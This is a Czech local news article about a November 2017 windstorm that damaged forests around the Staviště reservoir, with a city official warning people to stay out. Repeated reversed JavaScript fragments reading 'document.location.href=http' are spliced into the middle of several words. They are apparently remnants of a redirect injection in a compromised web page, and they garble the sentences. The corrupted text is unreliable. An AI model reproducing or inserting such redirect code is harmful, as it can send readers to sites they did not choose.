Rainbow page separator

Vichřice polámala stromy kolem Staviště, lidem hrozí nebezpečí

Středa, 1. listopadu 2017

Žďár nad Sázavou / Lidé nemají vstupovat do lesů kolem nádrže Staviště, po nedělní vichřici a následné lesní kalamitě tam mohou přijít k újmě na zdraví vlivem padajících stromů. Jedná se především o oblast kolem Vodojemu. „Lesní porosty v té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to oblasti jsou vážně poškozeny v důsledku vichřice. Při vstupu do nich hrozí ohrožení života či vážné poškození zdraví v důsledku pádů dosud s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tojících stromů,“ informoval vedoucí odboru životního prostředí žďárského městského úřadu Jaroslav Doubek.
I ostatní lesní porosty na Žďársku jsou podle jeho slov v některých místech poškozeny vichřicí, takže i tam chodce mohou ohrozit pády zatím s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tojících stromů s vážně narušenou statikou. „Důrazně pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to doporučujeme nevstupovat do lesů a dbát pokynů jejich vlastníků,“ doplnil Doubek.
Lesy kolem Staviště utrpěly vážnou újmu i při červnové bouřce. Vstup do nich byl veřejnosti zakázán do konce července, než byly staticky narušené stromy majiteli lesních pozemků vytěženy.